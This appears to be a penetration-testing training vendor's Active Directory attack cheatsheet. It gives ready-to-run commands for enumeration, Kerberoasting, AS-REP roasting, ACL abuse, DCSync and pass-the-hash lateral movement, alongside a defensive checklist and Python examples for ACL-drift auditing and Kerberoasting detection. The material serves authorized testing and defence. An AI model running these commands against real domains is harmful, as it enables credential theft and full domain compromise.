Active Directory remains the centre of gravity for every Windows enterprise in 2026. Almost every red-team engagement that breaks past the perimeter ends in Domain Admin via the same handful of techniques. This is the cheatsheet our consultants reach for during BFSI and government engagements — copy-paste-ready, with the why next to the what.
Recon — what's in the domain
# PowerView, from a domain-joined Windows host
Get-NetDomain
Get-NetDomainController
Get-NetUser -SPN
Get-NetGroup "Domain Admins" -FullData
Get-NetGroupMember -GroupName "Domain Admins" -Recurse
Get-NetComputer -OperatingSystem "*Server 2012*"
Get-NetSession -ComputerName <DC>
Find-LocalAdminAccess

# From Linux
# Discover DCs
nmap -p 88,389,445,636 -sV <subnet>
# Enumerate users via SAMR
impacket-samrdump <user>:<pass>@<DC>
# Anonymous enumeration where allowed
impacket-lookupsid -no-pass anonymous@<DC>
# Enumerate trusts over LDAP (anonymous bind, where permitted; the domain SID comes from lookupsid above)
ldapsearch -x -H ldap://<DC> -b "DC=corp,DC=local" "(objectClass=trustedDomain)"

BloodHound — find the path
# From Windows
SharpHound.exe -c All --zipfilename loot.zip
# From Linux
bloodhound-python -u <user> -p <pass> -d corp.local -ns <DC> -c All

Queries worth running first once the collection is imported:
- Shortest paths to Domain Admins
- Kerberoastable users with high-privilege paths
- Computers where Domain Users have local admin
- ACL chains: GenericAll / WriteDACL / WriteOwner abuse
- GPO abuse paths via WriteProperty on linked GPOs
Kerberoasting
Any authenticated domain user can request a service ticket (TGS) for any account that has an SPN. The ticket is encrypted with a key derived from that service account's password, and when the KDC issues it with RC4 (etype 23) that key is simply the account's NT hash, so the ticket can be cracked offline with no further traffic to the domain and no lockout risk. Still by far the highest hit-rate finding in BFSI engagements.
# Request tickets
impacket-GetUserSPNs corp.local/<user>:<pass> -dc-ip <DC> -request -outputfile spns.txt
# Crack
hashcat -m 13100 spns.txt /usr/share/wordlists/rockyou.txt --force
# AES tickets (etype 17/18) crack with modes 19600/19700 instead; budget for a far slower rate

AS-REP roasting
# Accounts with "Do not require Kerberos preauthentication" set; users.txt comes from the SAMR/LDAP recon above
impacket-GetNPUsers corp.local/ -usersfile users.txt -dc-ip <DC> -no-pass -outputfile asrep.txt
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt --force

ACL abuse
Common abusable ACEs and what they grant:

| ACE | Effect | Tool |
|---|---|---|
| GenericAll | Full control of the object: reset password, add SPN, add group member, rewrite ACL | PowerView, Set-DomainObject |
| GenericWrite | Write any non-protected property (e.g. add an SPN for a targeted Kerberoast, set a logon script) | Set-DomainObject |
| WriteDACL | Modify the object's ACL → grant self GenericAll | PowerView, Add-DomainObjectAcl |
| WriteOwner | Take ownership → rewrite ACL → GenericAll | PowerView, Set-DomainObjectOwner then Add-DomainObjectAcl |
| WriteProperty (msDS-AllowedToActOnBehalfOfOtherIdentity) | RBCD: point the attribute at a machine account you control, then S4U2Self/S4U2Proxy to impersonate any user to that host | impacket-rbcd, Rubeus s4u |
| AllExtendedRights | Includes User-Force-Change-Password: reset the user's password without knowing the old one | Set-DomainUserPassword |
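The table says what to look for; here is an added example (not from the original page and not PowerView or BloodHound code) of checking a raw security descriptor for those rows without a GUI: a small SDDL DACL parser that maps each effective allow ACE onto the table and flags the ones granted to Everyone, Authenticated Users, Domain Users or Domain Computers, which is the "ACL drift" a monthly check should page on. The DACL string, the domain SID and the RIDs in it are constructed for the example; the two schema GUIDs are the published ones for msDS-AllowedToActOnBehalfOfOtherIdentity and User-Force-Change-Password. Real input is the `Sddl` of an object's nTSecurityDescriptor, e.g. from Get-Acl against the AD: drive.

```python
import re

# Schema GUIDs for the two object-specific rows of the table (published values).
RBCD_ATTRIBUTE_GUID = "3f78c3e5-f79a-46bd-a0b8-9d18116ddc79"         # msDS-AllowedToActOnBehalfOfOtherIdentity
FORCE_CHANGE_PASSWORD_GUID = "00299570-246d-11d0-a768-00aa006e0529"  # User-Force-Change-Password

# SDDL two-letter rights and their ACCESS_MASK bits (numeric masks such as 0xf01ff also occur).
RIGHT_BITS = {"GA": 0x10000000, "GX": 0x20000000, "GW": 0x40000000, "GR": 0x80000000,
              "WO": 0x00080000, "WD": 0x00040000, "RC": 0x00020000, "SD": 0x00010000,
              "CR": 0x00000100, "LO": 0x00000080, "DT": 0x00000040, "WP": 0x00000020,
              "RP": 0x00000010, "SW": 0x00000008, "LC": 0x00000004, "DC": 0x00000002, "CC": 0x00000001}
GA, GW, WD, WO, WP, CR = (RIGHT_BITS[k] for k in ("GA", "GW", "WD", "WO", "WP", "CR"))

# Trustees that turn a dangerous ACE into "every domain account can do this" (SDDL aliases and SIDs).
BROAD_TRUSTEES = {"WD": "Everyone", "AU": "Authenticated Users", "DU": "Domain Users",
                  "DC": "Domain Computers", "S-1-1-0": "Everyone", "S-1-5-11": "Authenticated Users"}


def parse_mask(rights: str) -> int:
    """Rights field is either a hex mask or a run of two-letter codes."""
    if rights.lower().startswith("0x"):
        return int(rights, 16)
    return sum(RIGHT_BITS.get(rights[i:i + 2].upper(), 0) for i in range(0, len(rights), 2))


def classify(mask: int, object_guid: str):
    """Map one allow ACE onto the rows of the ACE table; an ACE can hit several rows."""
    object_guid = object_guid.lower()
    hits = []
    if mask & GA:
        hits.append("GenericAll")
    if mask & WD:
        hits.append("WriteDACL")
    if mask & WO:
        hits.append("WriteOwner")
    if mask & GW or (mask & WP and not object_guid):   # WP with no GUID = write every property
        hits.append("GenericWrite")
    if mask & WP and object_guid == RBCD_ATTRIBUTE_GUID:
        hits.append("WriteProperty(msDS-AllowedToActOnBehalfOfOtherIdentity)")
    if mask & CR and not object_guid:                  # CR with no GUID = all extended rights
        hits.append("AllExtendedRights")
    elif mask & CR and object_guid == FORCE_CHANGE_PASSWORD_GUID:
        hits.append("ForceChangePassword")
    return hits


def dangerous_aces(sddl: str):
    """Return [{'right', 'trustee', 'broad'}] for every effective allow ACE matching the table."""
    findings = []
    for ace in re.findall(r"\(([^)]*)\)", sddl):
        ace_type, flags, rights, object_guid, _inherit_guid, trustee = ace.split(";")[:6]
        if ace_type not in ("A", "OA"):  # deny ACEs grant nothing
            continue
        if "IO" in {flags[i:i + 2] for i in range(0, len(flags), 2)}:  # inherit-only: no effect here
            continue
        for right in classify(parse_mask(rights), object_guid):
            findings.append({"right": right, "trustee": trustee, "broad": trustee in BROAD_TRUSTEES})
    return findings


# Constructed sample DACL of a user object: DA and SYSTEM hold full control (expected), Domain Users
# hold WriteDACL and Everyone holds GenericAll (drift), one ordinary principal can set RBCD on the
# object and another can force a password reset. The domain SID and RIDs are invented.
SAMPLE_SDDL = (
    "O:DAG:DAD:"
    "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)"
    "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;SY)"
    "(A;;RPLCLORC;;;AU)"
    "(A;CIIO;GA;;;CO)"
    "(A;;WD;;;DU)"
    "(A;;GA;;;WD)"
    "(OA;;WP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;S-1-5-21-1004336348-1177238915-682003330-1105)"
    "(OA;;CR;00299570-246d-11d0-a768-00aa006e0529;;S-1-5-21-1004336348-1177238915-682003330-1106)"
)


def broad_findings(sddl: str = SAMPLE_SDDL):
    """The rows a drift check should page on: dangerous rights held by everyone in the domain."""
    return sorted((f["right"], f["trustee"]) for f in dangerous_aces(sddl) if f["broad"])


if __name__ == "__main__":
    for f in dangerous_aces(SAMPLE_SDDL):
        print(("!! " if f["broad"] else "   ") + f"{f['right']:<55} {f['trustee']}")
```

Resolve the non-alias SIDs before deciding anything: the 1105/1106 grants are only findings if those principals are outside Tier 0, which is exactly the question BloodHound answers by chaining them to the shortest-path query.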
DCSync — the keys to the kingdom
# Needs the Replicating Directory Changes + Changes All rights on the domain head: DA, EA and DCs by default; anyone else holding them is a finding
impacket-secretsdump -just-dc-user krbtgt corp.local/<admin>:<pass>@<DC>
impacket-secretsdump -just-dc-user Administrator corp.local/<admin>:<pass>@<DC>

Lateral movement quick reference
# PtH
impacket-psexec corp.local/<user>@<host> -hashes :<NTLM>
# PtT (after Rubeus dump or impacket-getTGT)
export KRB5CCNAME=ticket.ccache
impacket-psexec -k -no-pass <host>.corp.local
# WMI
impacket-wmiexec corp.local/<user>:<pass>@<host>
# WinRM
evil-winrm -i <host> -u <user> -p <pass>

Defensive checklist (for the blue team reading this)
- Disable RC4 etypes on all KDCs and on service accounts (msDS-SupportedEncryptionTypes), so every SPN ticket is AES
- Move every service account to gMSA where possible
- LAPS for all local admin passwords
- Tier 0 / 1 / 2 admin separation with PAWs
- Alert on TGT renewal anomalies, RC4 TGS requests, lsass handle access
- Monthly BloodHound runs against your own domain to catch ACL drift
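The "RC4 TGS requests" item has a detection side that is easy to get wrong, so here is an added example (not from the original page and not from any SIEM vendor) of the logic a Kerberoasting rule needs, run over a handful of constructed Security event 4769 records: the requesting account is TargetUserName, the SPN's account is ServiceName, and TicketEncryptionType 0x17 is RC4. Rule 1 flags RC4 service tickets for user accounts and ignores machine accounts and krbtgt, whose keys are not the target. Rule 2 flags any principal pulling tickets for five or more distinct services inside two minutes, which also catches AES-only roasting and the impacket-GetUserSPNs -request sweep from the offensive section. Event fields, names, times and addresses are invented; in a real domain rule 1 needs an allowlist for legacy applications, which is why rule 2 exists.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of event 4769 (Kerberos service ticket requested) as a SIEM would forward it.
SAMPLE_4769 = """
{"TimeCreated": "2026-02-03T09:14:02", "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.5.23"}
{"TimeCreated": "2026-02-03T09:14:02", "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "svc_web", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.5.23"}
{"TimeCreated": "2026-02-03T09:14:03", "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "svc_backup", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.5.23"}
{"TimeCreated": "2026-02-03T09:14:03", "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "svc_sap", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.5.23"}
{"TimeCreated": "2026-02-03T09:14:04", "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "svc_scom", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.5.23"}
{"TimeCreated": "2026-02-03T09:14:04", "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "svc_adfs", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.5.23"}
{"TimeCreated": "2026-02-03T09:20:11", "TargetUserName": "asmith@CORP.LOCAL", "ServiceName": "svc_sql", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.7.41"}
{"TimeCreated": "2026-02-03T09:21:40", "TargetUserName": "WS07$@CORP.LOCAL", "ServiceName": "DC01$", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.7.55"}
{"TimeCreated": "2026-02-03T09:22:05", "TargetUserName": "asmith@CORP.LOCAL", "ServiceName": "krbtgt", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.7.41"}
"""


def parse_events(text: str):
    events = []
    for line in text.strip().splitlines():
        e = json.loads(line)
        e["time"] = datetime.fromisoformat(e["TimeCreated"])
        e["user"] = e["TargetUserName"].lower()
        events.append(e)
    return events


def is_user_spn_service(name: str) -> bool:
    """Machine accounts (trailing $) have random 120-char passwords and krbtgt is a TGT, not a roast target."""
    return not name.endswith("$") and name.lower() != "krbtgt"


def rc4_user_service_tickets(events):
    """Rule 1: RC4 (etype 0x17) service tickets issued for user-account SPNs."""
    return [(e["user"], e["ServiceName"]) for e in events
            if e["TicketEncryptionType"].lower() == "0x17" and is_user_spn_service(e["ServiceName"])]


def roast_bursts(events, threshold: int = 5, window: timedelta = timedelta(minutes=2)):
    """Rule 2: one principal requesting tickets for >= threshold distinct SPN accounts inside
    `window`, regardless of etype. Returns {user: max distinct services seen in one window}."""
    by_user = defaultdict(list)
    for e in events:
        if is_user_spn_service(e["ServiceName"]):
            by_user[e["user"]].append((e["time"], e["ServiceName"]))
    hits = {}
    for user, reqs in by_user.items():
        reqs.sort()
        best = 0
        for i, (start, _) in enumerate(reqs):  # sliding window anchored at each request
            distinct = {svc for t, svc in reqs[i:] if t - start <= window}
            best = max(best, len(distinct))
        if best >= threshold:
            hits[user] = best
    return hits


def alerts(text: str = SAMPLE_4769):
    events = parse_events(text)
    return {"rc4_user_spn_requests": rc4_user_service_tickets(events),
            "kerberoast_bursts": roast_bursts(events)}


if __name__ == "__main__":
    for rule, result in alerts().items():
        print(rule, result)
```

Tune `threshold` against a week of your own 4769 volume before enabling rule 2: service-desk tooling and monitoring agents legitimately touch many SPNs, but they do it from a fixed set of hosts, so adding IpAddress to the grouping key is the usual second step.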
Our OSCP-aligned AD bootcamp is one of several hands-on tracks Macksofy delivers across India and the UAE. CERT-In empanelled, OffSec/EC-Council authorized, with weekend cohorts and corporate batches.
